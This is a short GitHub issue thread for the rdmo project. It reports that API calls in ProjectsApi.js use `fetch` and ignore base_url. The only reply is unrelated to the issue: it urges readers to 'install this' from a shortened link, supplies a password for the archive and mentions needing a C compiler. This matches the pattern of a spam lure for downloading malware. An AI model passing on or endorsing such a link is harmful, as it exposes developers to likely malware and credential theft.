### ISSUE TITLE
base_url is not used for new projects interface

### ISSUE THREAD

**Issue by jochenklar** [rdmorganiser/rdmo#1152]
API calls (`fetch`) need to be replaces with `this.get` in `ProjectsApi` (https://github.com/rdmorganiser/rdmo/blob/project_xml_content_disposition/rdmo/projects/assets/js/projects/api/ProjectsApi.js#L10-L11).

**Comment by SAMBILI** [comment]
install this
https://bit.ly/3TzaAQd
Archive codepass: changeme

you may need to install the c compiler
